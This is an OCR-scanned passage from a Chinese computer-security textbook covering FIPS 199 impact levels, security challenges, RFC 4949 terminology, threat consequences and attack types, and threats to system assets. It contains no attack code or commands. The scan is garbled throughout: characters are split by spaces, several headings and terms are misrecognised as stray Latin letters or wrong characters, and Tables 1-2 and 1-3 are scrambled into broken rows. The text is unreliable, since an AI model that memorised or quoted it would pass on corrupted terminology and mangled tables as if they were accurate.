违规 ( 即 机 密 性 、 完 整 性 或 可 用 性 缺失 ) 的 机 构 或 个 人 根据 其 所 造成 的 影响 分 为 三 个 级 别 。 这 
些 级 别 定义 在 FIPS 199 中 : 

e 低级 : 安全 缺失 会 给 机 构 运转 、 机 构 资 产 或 个 人 带 来 有 限 的 负面 影响 。 例 如 ， 机 密 性 、 

完整 性 或 可 用 性 的 缺失 可 能 会 : (i) 导致 任务 处 理 能 力 在 一 定 程度 上 退化 ， 尽 管 在 此 期 
间 机 构 能 够 完成 其 主要 职责 ， 但 其 效率 明显 降低 ; (ii) 导致 机 构 资产 的 少许 破坏 ;( 十) 
导致 少许 财务 损失 ; (iv) 导致 对 个 人 的 少许 危害 。 

e 中 级 : 安全 缺失 会 给 机 构 运 转 、 机 构 资 产 或 个 人 带 来 严重 的 负面 影响 。 例 如 ， 机 密 

性 、 完 整 性 或 可 用 性 的 缺失 可 能 会 : (i) 导致 任务 处 理 能 力 明 显 退 化 ， 尽 管 在 此 期 
间 机 构 能 够 完成 其 主要 职责 ， 但 其 效率 明显 降低 ; (ii) 导致 机 构 资产 明显 被 破坏 ; 


日 ”这 些 例子 摘自 普度 大 学 信息 技术 安全 和 保密 办 公 室 发 布 的 安全 策略 文献 。 
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(iii) 导致 明显 的 财务 损失 ; Civ) 导致 对 个 人 的 明显 危害 ， 但 不 涉及 失去 生命 或 者 严 
重 危 及 生命 的 伤害 。 

e BA: 安全 缺失 会 给 机 构 运 转 、 机 构 资 产 或 个 人 带 来 非常 严重 的 或 者 灾难 性 的 负面 影 
响 。 例 如 ， 机 密 性 、 完 整 性 或 可 用 性 的 缺失 可 能 会 : (i) 导致 任务 处 理 能 力 的 严重 退 
化 ,在 此 期 间 机 构 不 能 完成 其 一 个 或 多 个 主要 职责 ; (ii) 导致 机 构 资 产 的 严重 破坏 ; 
(iii) 导致 严重 的 财务 损失 ; Civ) 导致 对 个 人 严重 的 、 灾 难 性 的 危害 ， 包 括 失去 生命 或 
严重 危及 生命 的 伤害 。 

WEE ”学生 的 成 绩 信 息 可 以 看 作 是 资产 ， 它 的 机 密 性 对 于 学 生来 讲 是 非常 重要 的 。 在 美 
国 ， 这 些 信息 的 公布 是 受 家 庭 教育 权利 及 隐私 法 ( The Family Education Rights and Privacy Act, 
FERPA) 约束 的 。 成 绩 信息 应 该 对 学 生 、 学 生 的 父母 及 需要 该 信息 来 完成 相应 工作 的 员工 是 公 
开 的 。 学 生 注 册 信息 应 该 具有 中 等 机 密 等 级 。 该 信息 也 受 FERPA 约束 管理 ， 但 可 被 更 多 的 从 
事 日 常 管理 工作 的 人 看 到 。 相 对 于 成 绩 信 息 ， 学 生 注册 信息 受到 攻击 的 可 能 性 更 小 ， 如 果 被 披 
露 ， 导 致 的 损害 更 小 。 对 于 名 录 信 息 (如 学 生 或 教师 名 单 、 院 系列 表 ) 可 以 给 其 分 配 一 个 低 机 
密 等 级 或 者 实际 上 不 评级 。 这 些 信息 一 般 对 公众 公开 ， 可 以 在 学 校 的 网 站 上 获得 。 

完整 性 ”完整 性 的 几 个 方面 可 以 通过 存储 在 数据 库 中 的 医院 病人 过 敏 史 信息 来 说 明 。 医 生 
应 该 相信 该 信息 的 正确 性 和 即时 性 。 现 在 ,假定 被 授权 能 够 查看 并 可 更 新 该 信息 的 员工 (如 护 
+) 故意 伪造 数据 以 损害 医院 ， 数 据 库 则 需要 快速 地 恢复 到 以 前 的 可 信 状 态 ， 并 能 追查 出 现 的 
错误 ， 找 到 责任 人 。 病 人 过 敏 史 的 信息 是 资产 对 完整 性 要 求 较 高 的 一 个 例子 。 不 准确 的 信息 会 
对 病人 产生 严重 伤害 甚至 危及 生命 ， 并 使 得 医院 陷 人 窘境 。 

资产 被 分 配 中 等 完整 性 要 求 级 别 的 例子 是 一 个 为 注册 用 户 提供 讨论 某 些 特定 话题 的 论坛 的 
网 站 。 注 册 用 户 或 者 黑客 能 够 自 改 一 些 内 容 或 者 破坏 网 站 。 如 果 论 坛 仅 用 于 用 户 娱乐 ， 广 告 收 
人 很 少 甚 至 没有 ， 不 用 于 重要 用 途 ( 如 研究 )， 那 么 潜在 的 威胁 并 不 严重 ， 网 站 经 营 者 仅 会 损 
失 少 量 数 据 、 金 钱 和 时 间 。 

完整 性 要 求 较 低 的 例子 是 匿名 网 上 投票 。 许 多 网 站 (如 新 闻 机 构 )， 在 其 用 户 投 票 时 几乎 
没有 采用 任何 安全 措施 。 然 而 ， 这 种 投票 方式 的 不 准确 性 和 不 科学 性 是 很 容易 理解 的 。 

可 用 性 ” 越 关 键 的 组 件 或 服务 ， 对 可 用 性 的 要 求 就 越 高 。 考 虑 一 个 为 关键 的 系统 、 应 用 程 
序 和 设备 提供 认证 服务 的 系统 。 服 务 中 断 会 使 得 访问 计算 机 资源 的 用 户 和 访问 所 需 资源 来 执行 
关键 任务 的 工作 人 员 无 能 为 力 。 服 务 不 可 用 会 转化 成 员工 丧失 生产 力 、 潜 在 客户 丢失 等 方面 的 
巨大 经 济 损失 。 

通常 评定 资产 具有 中 等 可 用 性 要 求 的 例子 是 大 学 的 公共 网 站 。 网 站 为 现在 和 未 来 的 学 生 及 
捐赠 者 提供 信息 。 这 样 的 一 个 站 点 并 不 是 该 大 学 信息 系统 的 关键 组 成 部 分 ， 但 是 如 果 不 可 用 ， 
则 会 引发 一 些 尴 傣 的 局 面 。 

电话 号 码 短 网 上 查询 程序 可 被 分 配 低 可 用 性 要 求 等 级 。 尽 管 服务 暂时 丧失 会 令 人 不快 ,但 
还 可 以 通过 其 他 方法 (如 纸 质 的 号 码 钴 或 接线 员 ) 来 获取 有 关 信 息 。 


1.1.3 ”计算 机 安全 面临 的 挑战 


计算 机 安全 很 诱 人 ， 同 时 也 很 复杂 。 原 因 如 下 : 

1. 计算 机 安全 问题 并 不 像 初学 者 想象 的 那样 简单 。 安 全 需求 看 起 来 是 非常 直接 的 ， 实 际 上 
大 多 数 主要 安全 服务 需求 都 可 以 用 含义 明确 的 一 个 术语 来 标识 ， 比 如 机 密 性 、 认 证 、 抗 抵赖 性 
和 完整 性 等 。 然 而 ， 满 足 这 些 需 求 的 机 制 可 能 非常 复杂 ， 要 充分 理解 它们 ， 可 能 会 涉及 相当 细 
致 的 推理 论证 。 

2. 在 开发 某 种 安全 机 制 或 算法 时 ， 我 们 必须 始终 考虑 对 这 些 安 全 特征 的 潜在 攻击 。 很 多 情 
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况 下 ， 成 功 的 攻击 往往 是 通过 一 种 完全 不 同 的 方式 来 观察 问题 的 ， 从 而 可 以 探测 机 制 中 不 可 预 
见 的 弱点 。 

3. 鉴于 第 二 点 所 述 的 原因 ， 用 于 提供 特定 服务 的 程序 (procedure) 通常 是 与 直觉 相反 的 。 
通常 情况 下 ， 安 全 机 制 的 设计 是 复杂 的 ， 不 能 单纯 地 通过 需求 来 判定 方法 是 否 可 用 。 只 有 在 充 
分 考虑 各 种 不 同 的 威胁 后 ， 安 全 机 制 的 设计 才 是 有 道理 的 。 

4. 对 于 已 经 设计 出 的 各 种 安全 机 制 ， 决 定 其 适用 场合 是 非常 必要 的 。 这 无 论 是 在 物理 布局 
层面 (如 网 络 中 的 哪些 节点 需要 特定 的 安全 机 制 ) 还 是 在 逻辑 层面 (如 网 络 体系 结构 如 TCP/IP 
中 的 哪 一 层 或 哪 几 层 应 该 采取 安全 机 制 )， 都 是 非常 重要 的 。 

5. 安全 机 制 通常 包含 不 止 一 种 算法 或 协议 。 它 们 还 要 求 参与 者 拥有 一 些 机 密 信息 (如 加 密 
密 钥 )， 这 就 产生 了 一 系列 诸如 创建 、 分 发 和 保护 该 机 密 信息 之 类 的 问题 。 这 里 存在 对 通信 协 
议 的 信任 问题 ， 这 些 协议 的 行为 可 能 会 使 开发 安全 机 制 的 工作 复杂 化 。 例 如 ， 如 果 安 全 机 制 的 
某 些 功 能 要 求 对 从 发 送 者 到 接受 者 的 消息 传输 时 间 设 置 时限 ， 那 么 ， 任 何 引 入 各 种 不 可 预见 延 
迟 的 协议 或 网 络 都 可 能 会 使 时 限 变 得 毫 无 意义 。 

6. 从 本 质 上 讲 ， 计 算 机 安全 就 是 利用 安全 脆弱 性 进行 破坏 的 攻击 者 和 尽力 阻止 攻击 的 设计 
者 或 管理 者 之 间 的 一 场 智力 的 较量 。 对 于 攻击 者 ， 主 要 优势 在 于 他 只 需要 找到 一 个 安全 脆弱 性 
或 漏洞 即 可 ; 而 管理 者 必须 找到 且 消 除 所 有 的 安全 弱点 才能 得 到 真正 的 安全 。 

7. 对 于 部 分 用 户 和 系统 管理 者 来 说 ， 有 这 样 一 种 自然 的 倾向 : 在 安全 保障 失效 之 前 ， 很 少 
能 够 看 到 安全 投入 所 带 来 的 好 处 。 

8. 安全 要 求 定 期 甚至 持续 地 对 系统 进行 监视 ， 但 是 在 目前 注重 时 效 、 超 负荷 运转 的 系统 环 
境 中 很 难 做 到 这 一 点 。 

9. 安全 性 通常 还 是 事后 考虑 的 问题 一 一 在 系统 设计 完成 后 才 加 入 系统 ， 而 没有 作为 设计 过 
程 中 的 一 个 有 机 组 成 部 分 来 看 待 。 

10. 许多 用 户 力 至 安全 管理 者 认为 ， 坚 固 的 安全 性 有 碍 于 信息 系统 或 信息 使 用 的 高 效 性 和 
用 户 操作 的 友好 性 。 

在 本 书 中 ， 当 我 们 分 析 各 种 不 同 的 安全 威胁 和 安全 机 制 时 ， 上 述 所 列举 的 这 些 难 题 将 会 经 
常 遇 到 。 


1.1.4 ”一 个 计算 机 安全 模型 


现在 我 们 先 介 绍 一 些 贯穿 本 书 始终 的 有 用 术语 。 这 些 术语 是 依据 RFC 4949 一 一 Internet $ 
全 术语 表 9 的 。 表 1-1 给 出 了 这 些 术 语 的 定义 ， 图 1-1 基于 文献 [CCPS12a]， 展 示 了 其 中 一 些 
术语 之 间 的 关系 。 我 们 先 从 用 户 和 所 有 者 希望 保护 的 系统 资源 (system resource) 或 资产 (asset) 
说 起 。 计 算 机 系统 资产 的 分 类 如 下 : 

© 硬件 : 包括 计算 机 系统 和 其 他 数据 处 理 、 数 据 存储 和 数据 通信 的 设备 。 

o 软件 : 包括 操作 系统 、 系 统 实用 程序 和 应 用 程序 。 

e 数据 : 包括 文件 和 数据 库 ， 也 包括 与 安全 相关 的 数据 ， 比 如 口令 文件 。 

e 通信 设施 和 网 络 : 局 域 网 和 广域网 的 通信 线路 、 网 桥 、 路 由 器 ， 等 等 。 

在 安全 语 境 中 ， 我 们 关心 的 是 系统 资源 的 脆弱 性 (vulnerability)。[NRC02] 列 出 了 有 关 计 
算 机 系统 或 网 络 资产 脆弱 性 通常 的 分 类 : 

e 系统 资源 可 能 被 恶意 损坏 ( corrupted)， 以 至 于 做 出 不 当 的 操作 或 者 给 出 错误 的 应 答 。 

比如 ， 存 储 的 数据 值 被 不 正当 地 修改 而 使 之 与 其 原始 值 不 同 。 


QO 见 第 0 章 中 有 关 REC 的 解释 。 


© 系统 资源 可 能 被 泄漏 〈leaky)。 比 如 ， 某 人 本 来 不 能 通过 网 络 访问 某 些 或 全 部 可 用 信 
息 ， 但 他 却 获得 了 这 种 访问 。 
© 系统 资源 可 能 变 得 不 可 用 (unavailable) 或 非常 慢 。 也 就 是 说 ， 使 用 系统 或 网 络 变 得 不 
可 能 或 不 现实 。 
这 三 种 脆弱 性 的 通常 类 型 分 别 对 应 于 本 节 前 面 所 提 到 的 完整 性 、 机 密 性 和 可 用 性 三 个 
概念 。 


表 1-1 计算 机 安全 术语 ( 源 自 RFC 4949, Internet 安全 术语 表 ，2000 年 5 月 ) 


敌手 (威胁 代理 )(adversary (threat agent) ) 

攻击 或 威胁 系统 的 实体 。 
攻击 (attack) 

对 系统 安全 的 袭击 ， 起 源 于 智能 威胁 。 也 就 是 说 ， 故 意 试图 (特别 是 在 方法 或 技术 意义 上 ) 逃避 安全 服务 和 违反 
系统 安全 策略 的 智能 行为 。 


对 策 (countermeasure) 

用 于 降低 威胁 ， 减少 系 统 脆 弱 性 ， 消 除 和 阻止 攻击 并 将 其 产生 的 危害 降 至 最 低 ， 发 现 并 报告 以 便 进行 操作 调整 的 
操作 、 设 备 、 实 施 程 序 或 技术 。 
风险 (risk) 

以 特定 威胁 利用 具有 特定 危害 结果 的 特定 漏洞 的 可 能 性 来 表示 的 损失 的 期 望 值 。 
安全 策略 (security policy) 

通过 一 系列 规则 和 做 法 来 说 明 或 规定 系统 或 机 构 如 何 提供 安全 服务 来 保护 敏感 、 重 要 的 系统 资源 。 
系统 资源 (资产 ) (system resource (asset) ) 

包含 在 信息 系统 中 的 数据 ; 或 者 由 系统 提供 的 服务 ; 或 者 系统 的 能 力 ， 例 如 处 理 能 力 或 通信 带宽 ;或 者 系统 装备 
的 某 些 项 (如 系统 组 件 一 一 硬件 、 固 件 、 软 件 或 文档 ); 或 者 容纳 系统 操作 和 设备 的 设施 。 
威胁 (threat) 

潜在 的 安全 侵犯 ， 存 在 于 具有 可 能 妨害 安全 并 造成 损害 的 环境 、 能 力 、 动 作 或 事件 的 情况 下 。 也 就 是 说 ， 威 胁 是 
可 能 会 利用 安全 漏洞 的 潜在 危险 。 
脆弱 性 (vulnerability) 

系统 设计 、 实 现 、 运 行 和 管理 中 的 缺陷 和 弱点 ， 可 以 被 用 来 违反 系统 安全 策略 。 








图 1-1 安全 概念 及 其 关系 


与 系统 资源 的 各 种 安全 脆弱 性 相对 应 的 是 利用 这 些 安全 脆弱 性 产生 的 威胁 (threats)。 威 胁 
18j 表示 对 资产 的 潜在 安全 危害 。 攻 击 ( attack) 是 被 实施 的 威胁 (威胁 行为 )) 如 果 成 功 ， 将 会 导 
致 不 期 望 的 安全 侵害 或 威胁 后 果 。 执 行 攻击 的 主体 被 称 为 攻击 者 或 者 威胁 主体 〈threat agent). 
我 们 可 以 将 攻击 划分 为 两 类 : 
o 主动 攻击 (active attack): 试图 改变 系统 资源 或 影响 其 运行 。 
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© 被 动 攻击 passive attack): 试图 从 系统 中 学 习 或 利用 信息 ， 但 不 影响 系统 资源 。 
我 们 也 可 以 根据 攻击 的 发 起 位 置 对 攻击 进行 分 类 : 
© 内 部 攻击 (inside attack): 由 安全 边界 内 部 的 实体 (“内 部 人 ”) 发 起 的 攻击 。 内 部 人 是 
指 已 被 授权 访问 系统 资源 ， 但 以 未 经 授权 方 许可 的 方式 使 用 资源 的 内 部 实体 。 

© 外 部 攻击 (outside attack): 由 系统 安全 边界 外 部 的 非 授 权 用 户 或 非法 使 用 者 (“外 部 人 ”) 
发 起 的 攻击 。 在 Internet 网 络 上 ， 潜 在 的 外 部 攻击 者 包括 从 业余 的 恶作剧 者 到 有 组 织 的 
罪犯 、 国 际 怒 怖 分 子 和 敌对 政府 等 。 

最 后 ， 对 策 (countermeasure) 是 指 对 付 攻 击 所 采取 的 任何 手段 。 理 想 情 况 下 ， 对 策 能 够 
成 功 阻 止 ( prevent) 特定 类 型 的 攻击 。 在 某 些 情况 下 ， 当 阻止 不 可 能 或 失效 时 ， 目 标 就 是 检测 
(detect) 攻击 ， 并 从 攻击 造成 的 影响 中 恢复 (recover)。 对 策 本 身 可 能 会 引入 新 的 脆弱 性 。 无 论 
如 何 ， 在 执行 安全 对 策 后 ， 残 余 的 脆弱 性 可 能 还 存在 。 这 些 脆 弱 性 可 能 被 威胁 代理 利用 ， 表 现 
为 资产 的 残余 风险 (risk)。 资 产 所 有 者 将 通过 制定 其 他 约束 来 寻求 最 小 化 风险 。 


1.2 威胁 、 攻 击 和 资产 


下 面 我 们 开始 更 详细 地 分 析 威 胁 、 攻 击 和 资产 。 首 先 ， 和 弄 清 必须 要 处 置 的 安全 威胁 的 类 
型 ， 然 后 给 出 一 些 应 用 于 不 同 资产 分 类 的 威胁 类 型 的 例子 。 


1.2.1 威胁 与 攻击 


K 1-2 MA RFC 4949， 描 述 了 四 种 威胁 后 果 ， 并 列 出 了 导致 每 一 种 后 果 的 攻击 类 型 。 
表 1-2 威胁 后 果 及 导致 每 种 后 果 的 威胁 动作 类 型 ( 源 自 RFC 4949 ) 


威胁 后 果 威胁 动作 (攻击 ) 
暴露 : 敏感 数据 被 直接 泄露 给 非 授权 实体 
非 授权 泄露 截获 : 非 授权 实体 直接 访问 在 授权 的 源 和 目的 地 之 间 传 输 的 敏感 数据 
实体 未 经 授权 而 获得 对 数据 访问 | 推理 : 非 授 权 实 体 通 过 基于 特征 的 推理 或 通信 产品 间接 访问 敏感 数据 (但 不 一 
的 情况 或 事件 定 是 包含 在 通信 中 的 数据 ) 的 威胁 活动 
MB: 非 授权 实体 通过 躲避 系统 安全 保护 措施 来 获得 对 敏感 数据 的 访问 
欺骗 冒充 : 非 授权 实体 通过 伴 装 成 授权 实体 来 访问 系统 或 执行 恶意 行为 
导致 授权 实体 接受 虚假 数据 并 相 | 伪造 : 以 虚假 数据 欺骗 授权 实体 
信 其 正确 性 的 情况 或 事件 抵赖 : 一 个 实体 通过 虚伪 地 否认 对 行为 的 责任 而 欺骗 男 一 个 实体 
破坏 失 能 : 通过 禁用 系统 组 件 来 阻止 或 中 断 系统 运行 
中 断 或 阻止 系统 服务 和 功能 正确 | 损坏 : 通过 对 系统 功能 或 数据 的 不 利 修改 来 对 系统 运行 进行 非 期 望 的 改变 
运行 的 情况 或 事件 阻碍 : 通过 阻止 系统 运行 来 中 断 系统 服务 交付 的 威胁 活动 
a ; 
盗用 : 实体 对 系统 资源 采取 非 授 权 的 逻辑 或 物理 控制 
导致 系统 服务 或 功能 被 非 授 权 实 |a > A 
体 控制 的 情况 或 事件 RA: 导致 系统 组 件 执行 对 系统 安全 有 害 的 功能 或 服务 


非 授权 泄露 (unauthorized disclosure) 是 对 机 密 性 的 威胁 。 下 面 的 攻击 类 型 会 导致 这 样 的 
威胁 后 果 。 

o 暴露 (exposure): 这 可 能 是 故意 的 ， 如 内 部 用 户 蓄意 泄露 敏感 信息 (如 信用 卡 卡号 ) 给 
外 部 。 也 可 能 是 由 于 个 人 、 硬 件 或 软件 的 错误 而 导致 其 他 实体 获得 非 授权 的 敏感 数据 。 
有 很 多 这 种 情况 的 实例 ， 如 一 些 大 学 不 经 意 地 将 学 生 的 机 密 信息 公布 在 网 上 。 : 

© 截获 (interception): 在 通信 环境 中 ， 拦 截 是 最 普遍 的 一 种 攻击 方式 。 在 共享 式 局 域 网 
(LAN) 如 无 线 LAN 或 广播 以 太 网 中 ， 任 何 连接 到 LAN 的 设备 都 能 接收 到 期 望 发 送 给 
其 他 设备 的 数据 包 的 副本 。 在 Internet 上 ， 有 目的 的 黑客 能 够 访问 电子 邮件 通信 流量 和 
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其 他 数据 传输 情况 。 所 有 这 些 情 况 都 为 非 授权 访问 数据 创造 了 可 能 。 

o 推理 (inference): 通信 量 分 析 是 大 家 熟知 的 推断 的 例子 ， 敌 手 通过 观察 网 络 的 通 
言 流量 模式 得 到 信息 ， 例 如 网 络 中 特定 主机 间 的 通信 流量 。 另 一 个 例子 是 ， 具 有 某 
数据 库 受 限 访问 权 的 用 户 ， 可 以 推理 出 细节 信息 ， 这 是 通过 组 合 重复 查询 的 结果 而 


实现 的 。 
T © 入 侵 (intrusion): 人 侵 的 例子 是 敌手 通过 攻克 系统 的 访问 控制 保护 ， 得 到 对 敏感 数据 
20 的 非 授 权 访问 。 
欺骗 (deception) 是 对 系统 完整 性 或 数据 完整 性 的 威胁 。 下 面 的 攻击 类 型 会 导致 这 样 的 威 


胁 后 果 : 
e 冒充 ( masquerade) :冒充 的 一 个 例子 是 非 授 权 用 户 通过 伴 装 成 授权 用 户 访问 系统 ; 如 
果 非 授权 用 户 知道 其 他 用 户 的 注册 ID 和 口令 的 话 ， 这 种 情况 是 很 容易 发 生 的 。 另 一 个 
例子 是 恶意 代码 程序 ， 如 特洛伊 木马 ， 看 上 去 是 在 执行 有 用 或 预期 的 功能 ， 实 际 上 获 
得 了 系统 资源 的 非 授权 访问 或 者 欺骗 用 户 执行 其 他 恶意 逻辑 。 
伪造 (falsification) : 指 更 改 或 替换 有 效 数 据 或 将 虚假 数据 引入 文件 或 数据 库 。 例 如 ， 
学 生 可 能 在 学 校 数据 库 中 更 改 其 成 绩 。 
o 抵赖 (repudiation) : 在 这 种 情况 下 ， 用 户 和 否认 发 送 数据 ， 或 者 用 户 和 否认 接收 或 拥有 
数据 。 
破坏 (disruption) 是 对 系统 可 用 性 或 完整 性 的 威胁 。 下 面 的 攻击 类 型 会 导致 这 样 的 威胁 
JAR: 
e GE (incapacitation): 是 对 系统 可 用 性 的 攻击 ， 会 导致 物理 破坏 或 系统 硬件 的 损害 。 
更 具 代 表 性 的 恶意 软件 ， 例 如 特洛伊 木马 、 病 毒 或 蠕虫 ， 能 够 通过 这 种 方式 使 得 系统 
功能 丧失 或 它 的 部 分 服务 不 可 用 。 
© 损坏 (corruption) : 是 对 系统 完整 性 的 攻击 。 这 个 语 境 中 的 恶意 软件 可 能 使 得 系统 资源 
或 服务 以 不 期 望 的 方式 工作 。 或 者 用 户 通过 非 授权 方式 访问 系统 ， 修 改 它 的 某 些 功 能 。 
后 者 的 一 个 例子 是 用 户 在 系统 中 设置 后 门 逻 辑 ， 使 得 其 后 能 以 非 正常 程序 访问 系统 及 
其 资源 。 
o PHR (obstruction): 阻碍 系统 运行 的 一 种 方式 是 通过 中 断 通 信和 链 路 或 者 更 改 和 通信 控制 
信息 来 干扰 通信 。 另 一 种 方式 是 通过 对 通信 流量 或 处 理 器 资源 施加 额外 的 负担 使 系统 
过 载 。 
AF (usurption) 是 对 系统 完整 性 的 威胁 。 下 面 的 攻击 类 型 会 导致 这 样 的 威胁 后 果 : 
© 盗用 (misappropriation): 包括 服务 窃取 。 一 个 例子 是 分 布 式 拒绝 服务 攻击 ， 亚 意 软件 
被 安装 在 很 多 主机 上 ， 这 些 主机 将 作为 向 目标 主机 发 送 通信 流量 的 平台 。 在 这 种 情况 
下 ， 亚 意 软 件 将 非 授 权 使 用 处 理 器 和 操作 系统 资源 。 
o 误 用 (misuse): 误 用 经 常 由 恶意 代码 引起 ， 或 者 由 获得 对 系统 非 授权 访问 的 黑客 造成 。 
这 两 种 情况 下 ， 安 全 功能 被 禁用 或 被 阻碍 。 


1.2.2 威胁 与 资产 


计算 机 系统 资产 可 以 分 为 硬件 、 软 件 、 数 据 和 通信 线路 与 网 络 。 在 本 小 节 中 ， 我 们 
简单 描述 这 四 个 类 别 ， 并 将 它们 与 1.1 节 介 绍 的 完整 性 、 机 密 性 和 可 用 性 的 概念 联系 起 来 
( 见 图 1-2 和 表 1-3). 
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图 1-2 计算 机 安全 的 范围 


注 : 本 图 描述 了 物理 安全 之 外 的 安全 问题 ， 包 括 控制 对 计算 机 系统 的 访问 ,保护 通信 系统 上 传输 的 数据 及 存储 
的 数据 。 


表 1-3 计算 机 和 网 络 资产 的 威胁 举例 


设备 被 偷盗 或 禁用 ， 因 而 拒绝 | ”未 加 密 的 CD-ROM 或 DVD 
提供 服务 被 盗 
正在 运行 的 程序 被 修改 ， 
程序 被 删除 ， 拒 绝 用 户 访问 软件 的 非 授 权 拷贝 使 其 在 执行 过 程 中 失败 或 执 
行 一 些 非 预期 的 任务 


非 授 权 读 取 数 据 。 分 析 统 
文件 被 删除 ， 拒 绝 用 户 访问 ”| 计数 据 来 揭露 潜在 的 深层 次 | ”修改 已 有 文件 或 伪造 新 文件 
的 数据 
消息 被 破坏 或 删除 。 通 信 线 路 | ”消息 被 读 取 。 消 息 的 流量 | ”消息 被 修改 、 延 迟 、 重 新 
或 网 络 不 可 用 模式 被 观察 到 排序 或 复制 。 擅 造 虚假 消息 


硬件 ”对 计算 机 系统 硬件 主要 的 威胁 是 对 其 可 用 性 的 威胁 。 硬 件 最 容易 受到 攻击 ， 但 其 对 
自动 化 控制 最 不 敏感 。 威 胁 包括 意外 或 蓄意 地 对 设备 进行 破坏 和 偷盗 。 个 人 计算 机 和 工作 站 的 
盛行 及 计算 机 网 络 的 广泛 使 用 增加 了 该 领域 出 现 损失 的 可 能 性 。 偷 盗 CD-ROM 和 DVD 导致 
机 密 性 受 损 。 需 要 采用 物理 或 管理 方面 的 安全 措施 来 处 理 这 些 威胁 。 

软件 ”软件 包括 操作 系统 、 实 用 程序 和 应 用 程序 。 对 于 软件 主要 的 威胁 是 对 软件 可 用 性 的 
攻击 。 软 件 ， 尤 其 是 应 用 软件 通常 很 容易 被 删除 。 软 件 也 可 能 被 修改 或 被 破坏 而 不 能 使 用 。 说 
慎 的 软件 配置 管理 ， 包 括 对 软件 最 新 版 本 的 备份 ， 能 够 保持 其 高 可 用 性 。 更 难处 理 的 问题 是 对 
软件 进行 修改 ， 使 其 虽 仍 能 运行 ， 但 与 以 前 的 行为 大 不 相同 ， 这 是 对 软件 完整 性 / 真实 性 的 威 
胁 。 计 算 机 病毒 及 相关 攻击 就 归属 这 一 类 。 最 后 一 个 问题 是 保护 软件 不 被 盗版 。 尽 管 采 取 了 某 
些 对 策 , 但 总 的 来 说 软件 的 非 授权 拷贝 问题 还 没有 根本 解决 。 

数据 硬件 和 软件 安全 通常 由 计算 中 心 的 专家 关注 或 者 由 个 别 PC 机 用 户 关注 。 更 加 普遍 
的 问题 是 数据 安全 ， 其 涉及 由 个 人 、 团 体 或 商业 组 织 控制 的 文件 或 其 他 形式 的 数据 。 

关于 数据 方面 的 安全 问题 是 广泛 的 ， 包 含 可 用 性 、 机 密 性 和 完整 性 。 就 可 用 性 而 言 ， 我 们 
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关心 的 是 被 偶然 或 恶意 破坏 的 数据 文件 。 

对 于 保密 性 的 主要 威胁 是 非 授权 读 取 数 据 文件 或 数据 库 。 与 计算 机 安全 的 其 他 领域 相 比 ， 
这 个 领域 我 们 需要 进行 更 多 的 研究 和 付出 更 多 的 努力 。 一 种 对 保密 不 太 明 显 的 威胁 ， 是 进行 数 
据 分 析 并 在 使 用 提供 概括 和 聚集 信息 的 所 谓 统计 数据 库 的 过 程 中 表现 出 来 的 。 假 定 已 有 的 聚集 
信息 不 会 威胁 有 关 个 人 的 隐私 。 然 而 随 着 统计 数据 库 使 用 次 数 的 增加 ， 个 人 信息 泄露 的 可 能 性 
也 会 增加 。 事 实 上 ， 组 成 个 体 的 特征 可 以 通过 细致 的 分 析 识 别 出 来 。 例 如 ， 如 果 一 张 表 记录 着 
被 访 者 A、B、C 和 D 收入 的 合计 ， 而 另 一 个 表 记 录 着 被 访 者 A、B、C、D 和 E 收 入 的 合计 ， 
那么 两 个 合计 的 差 值 将 是 E 的 收入 。 如 果 进 一 步 要 求 合 并 数据 集 ， 这 个 隐私 信息 泄露 问题 还 
会 加 剧 。 许 多 情况 下 ， 为 了 保持 不 同 聚 集 级 别 的 一 致 性 而 匹配 几 个 数据 集 时 ， 需 要 访问 个 体 单 
元 。 因 而 ， 个 体 单 元 作为 隐私 问题 的 主体 ， 在 数据 集 处 理 的 不 同 阶段 都 可 以 获得 。 

= 最 后 ， 数 据 完整 性 在 大 多 数 安装 过 程 中 都 是 我 们 主要 关心 的 问题 。 对 数据 文件 的 修改 产生 
23| 的 后 果 可 能 很 小 也 可 能 很 严重 。 
通信 线路 和 网 络 ”网 络 安全 攻击 可 以 划分 为 被 动 攻 击 和 主动 攻击 。 被 动 攻击 企图 了 解 或 利 
用 系统 信息 ， 但 不 影响 系统 资源 。 主 动 攻击 则 试图 改变 系统 的 资源 或 者 影响 其 运行 。 
被 动 攻击 (passive attack) 的 本 质 是 窃听 或 监视 数据 传输 。 攻 击 者 的 目标 是 获取 传输 的 数 
据 信息 。 被 动 攻击 的 两 种 形式 是 消息 内 容 泄漏 和 流量 分 析 。 
e 消息 内 容 泄漏 (release of message content) 很 容易 理解 。 电 话 通话 、 电 子 邮 件 消 息 和 传 
输 的 文件 中 都 有 可 能 包含 敏感 或 机 密 信息 。 我 们 希望 能 阻止 对 手 了 解 传输 的 内 容 。 

© 另 一 种 被 动 攻击 即 流量 分 析 (traffic analysis) 更 加 巧妙 。 假 设 我 们 有 一 种 方法 可 以 隐藏 
消息 内 容 或 其 他 信息 流量 ， 使 得 攻击 者 即使 捕获 了 该 消息 也 不 能 从 消息 中 提取 出 信息 。 
通常 用 来 隐藏 内 容 的 技巧 是 加 密 。 即 使 我 们 恰当 地 进行 了 加 密 保 护 ， 对 手 仍 可 能 获得 
这 些 消 息 的 模式 。 对 手 可 以 确定 出 通信 主机 的 位 置 和 身份 ， 并 能 观察 到 正 被 交换 的 消 
息 的 频率 和 长 度 。 这 些 信息 对 于 判断 已 发 生 的 通信 的 性 质 很 有 帮助 。 

被 动 攻击 由 于 不 涉及 对 数据 的 修改 ， 所 以 很 难 察觉 。 通 常 ， 消 息 流量 表面 上 以 正常 的 方式 
发 送 和 接收 ， 收 发 双方 都 不 知道 有 第 三 方 已 经 读 取 该 消息 或 者 观察 了 流量 模式 。 尽 管 如 此 ， 阻 
止 这 些 攻击 还 是 切实 可 行 的 ， 通 常 使 用 加 密 的 方法 来 实现 。 因 此 ， 对 付 被 动 攻击 的 重点 是 阻止 
而 不 是 检测 。 

主动 攻击 (active attack) 包含 对 数据 流 进行 了 自 改 或 伪造 数据 流 ， 其 可 以 划分 为 四 类 : 重 放 、 
冒充 、 算 改 消息 和 拒绝 服务 。 

o Bim (replay) 涉及 被 动 获取 数据 单元 并 在 稍 后 重 传 ， 以 产生 非 授 权 的 效果 。 

© 冒充 ( masquerade) 发 生 在 一 个 实体 假装 成 另 一 个 不 同 实体 的 场合 。 骨 充 攻 击 通常 包含 

其 他 主动 攻击 形式 中 的 一 种 。 例 如 ， 捕 获 认证 序列 ， 并 在 有 效 的 认证 序列 之 后 重 放 ， 
这 样 就 可 以 使 具有 很 少 特权 的 授权 实体 通过 冒充 具有 更 多 特权 的 实体 而 获得 这 些 额 外 
的 特权 。 
